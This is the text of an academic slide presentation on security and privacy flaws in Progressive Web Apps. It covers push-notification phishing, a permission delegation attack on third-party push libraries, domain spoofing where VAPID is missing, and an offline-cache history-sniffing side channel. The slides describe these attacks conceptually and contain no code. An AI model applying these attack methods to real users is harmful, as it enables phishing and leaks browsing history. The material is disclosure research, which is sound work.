pride and prejudice in progressive web apps abusing
play

Pride and Prejudice in Progressive Web Apps : Abusing Native - PowerPoint PPT Presentation

Pride and Prejudice in Progressive Web Apps : Abusing Native App-like Features in Web Applications Jiyeon Lee, Hayeon Kim, Junghwan Park, Insik Shin, Sooel Son School of Computing, Graduate School of Information Security 1 Limitations of Web


  1. Pride and Prejudice in Progressive Web Apps : Abusing Native App-like Features in Web Applications Jiyeon Lee, Hayeon Kim, Junghwan Park, Insik Shin, Sooel Son School of Computing, Graduate School of Information Security 1

  2. Limitations of Web Apps • Users spend most of time in native apps • Reasons: ⁻ Heavily depend on network connection ⁻ Low user engagement Apps 188.6 Webs 9.3 Average minutes per visitor Source: comScore Mobile Metrix, U.S., Age 18+, June 2016 2

  3. Limitations of Native Apps • App usage is highly concentrated • Reasons: ⁻ High cost ⁻ Difficult to share Webs 11.4 Apps 4.0 Monthly Unique Visitors (M) Source: comScore Mobile Metrix, U.S., Age 18+, June 2016 3

  4. P rogressive W eb A pps (PWAs) • Introduced by Google in 2015 • Three design goals: reliable, fast, engaging • Success stories ⁻ Twitter Lite ⁻ Financial Times ⁻ Forbes Push Notifications Add to Home Screen Offline Browsing 4

  5. P rogressive W eb A pps (PWAs) • Introduced by Google in 2015 • Three design goals: reliable, fast, engaging Core Components: • Success stories 1) Service Worker 2) Cache ⁻ Twitter Lite ⁻ Financial Times 3) Push SERVICE WORKER ⁻ Forbes CACHE PUSH Push Notifications Add to Home Screen Offline Browsing 5

  6. This Study • We addressed the security and privacy risks to PWAs Vulnerabilities: 1) Service Worker à Cryptocurrency Mining 2) Cache à Inferring User’s Browsing History 3) Push à Phishing Attack SERVICE WORKER CACHE PUSH 6

  7. Technology behind PWAs: Service Worker • HTML5 Web standard technology • Supported by most browsers: ⁻ Firefox 44+, Chrome 45+, Edge 17+, Opera 32+ • Only usable on HTTPS websites • Able to run in the background even when a user leaves a website </> WEB APP SERVICE NETWORK WORKER 7

  8. Offline Browsing • Cache is an origin-bounded local storage • Accessible regardless of the network status • Provides programmable offline interfaces with Service Worker INTERNET SERVICE WORKER SERVICE WORKER CACHE CACHE 8

  9. Web Push Notifications • Re-engaging users with customized content • Can be received by Service Worker even if the browser is closed WEB PUSH SERVICE SERVER SERVER WORKER 9

  10. How Many PWAs Exist in the Wild? • A PWA is a website that registers Service Worker • Collected from the Alexa top 100,000 websites Features Used Number of websites Push 3,351 (80.5%) Cache 513 (12.3%) Both 196 (4.7%) Others 495 (11.9%) Total 4,163 (100%) 10

  11. I-I. Phishing Risks of Web Push 11

  12. General Appearance of Web Push 12

  13. General Appearance of Web Push ICON TITLE DOMAIN BODY 13

  14. Sender Can Customize, ICON TITLE DOMAIN BODY 14

  15. Sender Can Not Customize, ICON TITLE DOMAIN DOMAIN BODY • A domain name is the only element representing the source of a push message localhost:8000 15

  16. Vulnerabilities We Found • The environments that do not display domains ⁻ Firefox on GNOME, Ubuntu MATE, Cinnamon, Budgie, and Pantheon ⁻ Samsung Internet, Firefox on Android • Causes phishing risks Push without domain Push with domain Firefox Chrome Samsung Internet 16

  17. I-II. Phishing risks of Third-Party Push Libraries 17

  18. Emerging Third-party Push Services • Enable website owners to use push features • Provide useful features: ⁻ Scheduling push notifications, Reporting the statistics of subscribers, Supporting HTTP websites Image Source: https://sendpulse.com/features/webpush 18

  19. How push is Supported on HTTP Sites 19

  20. How push is Supported on HTTP Sites 20

  21. How push is Supported on HTTP Sites An actual permission dialog that a browser asks A css-styled permission dialog that is drawn by the library 21

  22. How push is Supported on HTTP Sites Bounding An address of A HTTPS domain that library creates website that user visits 22

  23. Permission Delegation Attack • A network attacker can redirect users to an attacker-controlled website • A visitor has no clue why she is redirected to a different domain NETWORK ATTACKER Powered by Attacker Allow http://benign.com to send notifications? X Powered by library 23

  24. I-III. Domain Name Spoofing Attack of Web Push Notifications 24

  25. Web Push in Detail 7. Push message sent to the browser 8. Push message sent to service worker 5. The endpoint stored 2. Subscribe to push service 6. Push message sent to the 3. Generated SERVICE WEB endpoint URL PUSH endpoint URL WORKER returned SERVER SERVER 1. Asks Yes Permission 4. The endpoint sent to the web server 25

  26. Web Push in Detail https://fcm.googleapis.com/fcm/send/dTb6ILBpUYs:A PA91bGX_Xa91bizHC- ol0qF9fj7f2u9lt3mExBdbhGsE0zCuXkPJioWDgo4wf1m 7. Push message sent to the browser TfZYgqX_-sVWRabWqx3GB9XiA9hsUf- 8. Push message sent to gVnwkkbD8oDLAUIhScYYrmeSZaricyZv3gq3hbzjh48Ad service worker An example of endpointURL 5. The endpoint stored 2. Subscribe to push service 6. Push message sent to the 3. Generated SERVICE WEB endpoint URL PUSH endpoint URL WORKER returned SERVER SERVER 1. Asks Yes Permission 4. The endpoint sent to the web server 26

  27. Web Push in Detail 7. Push message sent to the browser 8. Push message sent to service worker 5. The endpoint stored 2. Subscribe to push service 6. Push message sent to the 3. Generated SERVICE WEB endpoint URL PUSH endpoint URL WORKER returned SERVER SERVER 1. Asks Yes Permission 4. The endpoint sent to the web server 27

  28. Web Push in Detail 7. Push message sent to the browser 8. Push message sent to service worker 5. The endpoint stored 2. Subscribe to push service 6. Push message sent to the 3. Generated SERVICE WEB endpoint URL PUSH endpoint URL WORKER returned SERVER SERVER 1. Asks Yes Permission 4. The endpoint sent to the web server 28

  29. Web Push in Detail 7. Push message sent to the browser 8. Push message sent to service worker 5. The endpoint stored 2. Subscribe to push service The EndpointURL is 6. Push message confidential information! sent to the 3. Generated SERVICE WEB endpoint URL PUSH endpoint URL WORKER returned SERVER SERVER 1. Asks Yes Permission 4. The endpoint sent to the web server 29

  30. Web Push Protocol: VAPID 7. Payload received on the URL is Public Key sent to the browser 8. The payload is decrypted 5. Store the • Designed to authenticate web servers and sent to the service worker endpoint and • Utilizes asymmetrical key pairs encryption keys 2. Subscribe to push service ⁻ Without a private key, cannot send push messages 6. Send the encrypted payload 3. Get generated Private Key to the endpoint SERVICE WEB endpoint and PUSH WORKER encryption key SERVER SERVER 1. Permission Yes asking 4. Send the endpoint and encryption key to the web server 30

  31. VAPID in the Wild 7. Payload received on the URL is sent to the browser 8. The payload is decrypted 5. Store the Third-party Library VAPID and sent to the service worker endpoint and SnedPulse X encryption keys 2. Subscribe to Izooto X push service Pushwoosh X 6. Send the Foxpush X encrypted payload 3. Get generated OneSignal to the endpoint SERVICE WEB endpoint and PUSH WORKER encryption key SERVER Pushcrew SERVER X Pushengage X 1. Permission Yes Urbanairship asking 4. Send the endpoint and encryption key to the web server 31

  32. Domain Spoofing Attack 7. Payload received on the URL is sent to the browser 8. The payload is decrypted 5. Store the and sent to the service worker endpoint and A push with spoofed domain, “kirannewsagency.iz.do” encryption keys 2. Subscribe to push service 6. Send the encrypted payload 3. Get generated to the endpoint SERVICE NETWORK WEB endpoint and PUSH WORKER encryption key ATTACKER SERVER SERVER 1. Permission Yes asking 4. The endpoint sent to the web server over HTTP 32

  33. Why Phishing via Web Push Matters? • Difficult to determine the origin of messages • An attacker can send push messages at any time Real-world phishing 33

  34. II. User Privacy Leak via Offline Usage 34

  35. History Sniffing Attack • Critical privacy threat ⁻ E. Felten at al., Timing Attacks on Web Privacy [CCS 2000] ⁻ Z. Weinberg at al., I Still Know What You Visited Last Summer: Leaking Browsing History via User Interaction and Side Channel Attacks [S&P 2011] ⁻ S. Son at al., What Mobile Ads Know About Mobile Users [NDSS 2016] • Can leak personal information 35

  36. History Sniffing Attack on PWAs • A new side channel attack that exploits Cache 36

  37. History Sniffing Attack on PWAs • A new side channel attack that exploits Cache • How it works: https://attacker-pwa.com iframe of target 1 iframe of target 2 37

  38. History Sniffing Attack on PWAs • A new side channel attack that exploits Cache • How it works: 1. A victim opens the attacking PWA offline https://attacker-pwa.com iframe of target 1 iframe of target 2 38

  39. History Sniffing Attack on PWAs • A new side channel attack that exploits Cache • How it works: 1. A victim opens the attacking PWA offline https://attacker-pwa.com 2. An onload event will only be triggered iframe of target 1 Onload if victims have visited target PWAs event handler iframe of target 2 Onload event handler 39

Recommend


More recommend